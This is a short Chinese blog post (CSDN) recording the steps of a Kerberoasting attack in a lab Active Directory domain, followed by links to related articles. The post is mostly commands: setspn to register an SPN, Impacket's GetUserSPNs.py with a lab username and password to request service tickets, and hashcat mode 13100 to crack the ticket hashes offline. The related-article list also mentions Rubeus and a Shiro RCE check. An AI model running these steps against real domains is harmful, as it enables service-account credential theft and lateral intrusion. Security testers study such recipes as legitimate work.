Kerberoasting攻击步骤(简易)

已于 2023-07-10 21:23:46 修改
阅读量150 收藏
点赞数
分类专栏: 红蓝对抗-攻防安全 文章标签: 域渗透
于 2023-07-09 11:16:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38376348/article/details/131620470
版权

记录一下大概的步骤

1 在域控上给cert用注册SPN

setspn -U -S sqlserver/win.hacktest.com:1433/MSSQL cert

查询

setspn -L cert 

注册SPN

 2 利用

查询SPN

python3.9 GetUserSPNs.py hacktest.com/cert:Admin123456. -dc-ip 10.211.55.3             

请求服务票据

 python3.9 GetUserSPNs.py hacktest.com/cert:Admin123456. -dc-ip 10.211.55.3 -request-user cert

 尝试破解

将上面的内容保存成1.txt,使用hashcat破解

hashcat -m 13100 1.txt pass.txt --force

Adsatrtgo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
Kerberoasting攻击
Y22Lee的博客
06-04 1001
服务主体名称SPN(Server principal Name SPN),是服务实例(可以理解为一个服务,比如 HTTP、MSSQL)的唯一标识符。Kerberos 身份验证使用SPN将服务实例与服务帐户相关联。(在中如果有多个服务,每个服务必须有自己的SPN和用户,一个用户可以有多个SPN,但是SPN只能对应一个用户,SPN必须注册的用户下)SPN:服务主体名称,将服务用户和服务联系起来服务用户:用于登录运行服务的用户服务:计算机运行的服务。
课程汇报 kerberoasting攻击学习
weixin_46355597的博客
03-17 142
kerberoasting攻击学习
Kerberoast/Kerberoasting:攻击与检测
Ping_Pig的博客
10-21 2181
讲在前面: Kerberoasting攻击手法在渗透中是必不可缺的一项手法,它可以帮助你利用普通用户的权限在AD中提取到服务账户的凭据,又因为一般的服务账户密码策略可能较为薄弱或密码设置为永不过期等等。所以当攻击者拿到服务凭据后,花不了多大功夫就将其暴力破解了。 注意: Windows系统默认的服务已经映射到AD中的计算机账户中,该类账户具有关联的128个字符的密码,破解起来相对费劲。 针对这个问题我们需要了解如下两个协议,当然在这里我们只能简单的介绍,笔者参考了如下几篇优秀的论文以帮助您来了解K
深入理解 Kerberoasting 攻击
最新发布
qq_31812157的博客
03-11 572
是一种允许攻击者窃取使用RC4加密的KRB_TGS票证的技术,以暴力破解应用程序服务HASH来获取其密码Kerberos使用所请求服务的NTLM哈希来加密给定服务主体名称 (SPN) 的KRB_TGS票证。当用户向控制器KDC发送针对已注册SPN的任何服务的TGS 票证请求时,KDC会生成KRB_TGS攻击者可以离线使用例如hashcat来暴力破解服务帐户的密码,因为该票证已使用服务帐户的NTLM 哈希进行了加密。Kerberoasting攻击主要步骤如下1.发现SPN服务。
RedTeam Security-A Guide to Kerberoasting.png
07-24
RedTeam Security-A Guide to Kerberoasting.png
不推荐使用SharpRoast是各种PowerView的Kerberoasting功能的C#端口。-.NET开发
05-27
SharpRoast SharpRoast是各种PowerView的Kerberoasting功能的C#端口。 KerberosRequestorSecurityToken.GetRequest Method()方法由@machosec贡献给PowerView。 哈希以hashcat格式输出。 @ harmj0y是此端口的主要...
rubeus+spoolsample.zip渗透非约束性委派攻击实验
08-19
在非约束性委派攻击中,Rubeus可以帮助攻击者执行一系列步骤,如获取金票(Golden Ticket)、银票(Silver Ticket)以及执行Kerberoasting等技术。通过这些方法,攻击者可以模拟内的任何用户,从而获取敏感信息或...
Penetration-Testing-Cheat-Sheet:一份指南,可帮助渗透测试新手并希望获得渗透测试过程概述的人员。 本指南将帮助希望参加CREST CRT或Offensive Security的OSCP考试的任何人,并旨在涵盖损害主机的每个阶段
05-21
渗透测试 由安全顾问创建的一般注释存储库,用于帮助渗透测试领的新手。 该存储库面向希望成为渗透测试员的人员,同时帮助希望通过进攻性安全性OSCP考试的任何人。 这里列出的资源是从许多在线资源和书籍中挑选的...
突破企业网络新边界-身份认证协议攻防.pdf
07-02
Kerberos协议的攻击方式包括Kerberos密码喷洒、密码爆破、AS-ReproastingKerberoasting、黄金票据、白银票据约束、非约束委派攻击、基于资源的约束委派攻击、青铜比特攻击等。这些攻击方式可以让攻击者获得身份...
渗透完全技巧.pdf
10-03
【网络安全】是保护网络系统免受恶意攻击的关键领,而【内网渗透】则是网络安全...以上所述是渗透过程中的主要步骤和策略,这些知识对于网络安全防御者来说至关重要,理解这些攻击手法有助于构建更强大的防御体系。
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
攻击者可能尝试通过多种方式获取凭据,如Kerberoasting(利用Kerberos票据请求服务账户的哈希)和其他凭据盗窃技术。 8. **权限提升与横向移动**: 一旦获取一定权限,攻击者会尝试提升权限,如通过漏洞利用、提...
Kerberoast检测:Kerberoast检测脚本
02-09
Kerberoasting威胁行为者滥用有效的Kerberos票证授予票证的情况下,它通过Microsoft Active-Directory中的任何有效服务主体名称(SPN)来请求票证授予服务,此类票证授予服务容易受到脱机密码破解的攻击,这可能...
StandIn:StandIn是一个小型的.NET3545 AD开发后工具包
04-12
站在 StandIn是一个小型的AD折衷后工具包。 之所以出现StandIn,是因为最近在我们需要一个.NET本机解决方案来执行基于资源的约束委派。 但是,StandInSwift膨胀,包括许多舒适功能。...Kerberoasting(通过 )- 烘焙AS
Rubeus-Rundll32:通过Rundll32运行Rubeus
03-21
是此代码库的主要作者。 Rubeus已获得BSD 3条款许可。这个版本的灵感来自和为什么?该代码旨在用作通过rundll32来运行...用于Kerberoasting的方法由贡献给PowerView。为基于资源的受限委派做出了一些重要的工作。 是
鲁比乌斯:试图驯服三头狗
02-22
鲁比乌斯 Rubeus是用于原始Kerberos交互和滥用的C#工具集。 这在很大程度上改编自的... 该为Kerberoasting方法PowerView的被促成(,然后掺入鲁伯)由 。 是此代码库的主要作者。 Rubeus已获得BSD 3-条款许可。 目录
hat:HAT(Hashcat自动化工具)-用于常见单词列表和规则的自动化Hashcat工具,可加快订婚过程中破解哈希的过程。 为基于Linux的系统而创建
04-25
NTLMv2(NTHASH)-> NetNTLMv1-> NetNTLMv2-> MD5-> SHA-512-> RC4-HMAC-MD5(Kerberoasting) 特征: 对公开已知的违规行为进行直接的单词列表测试(取决于您的单词列表) 使用牛津词典通过各种组合增加的简单...
无法与“xxxx.com”的Active Directory控制器(AD DC)连接 之DNS故障
热门推荐
问题很多的小明
10-12 2万+
控机DC: win7加入控报错,发现无法加入环境,报错内容,“无法与“xxxx.com”的Active Directory控制器(AD DC)连接”: 排查问题,发现DNS解析存在问题 但是控机上解析是没有问题的: 抓包,发现本地DNS请求地址为ipV6,ipV6优先级高于Ipv4 解决问题:修改虚拟机网卡配置 关闭Ipv6 返回虚拟机: 重启网卡: 解析通过: 可以加入: ...
shiro RCE (反序列化漏洞)
问题很多的小明
06-02 6018
shiro RCE 攻击 这篇讲1.2.4的反序列化漏洞在实战中的记录 1 POC python shiro_check_key.py https://xxx.xxx.xxx.xxx "my0njp.dnslog.cn" DNSlog收到请求(平台地址:http://www.dnslog.cn/) 2 EXP 这里的回显是基于spring框架的,其实可以直接用过监听JMPServer直接执行命令 java -jar ShirobootRce.jar https://xxx.xxx.x
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值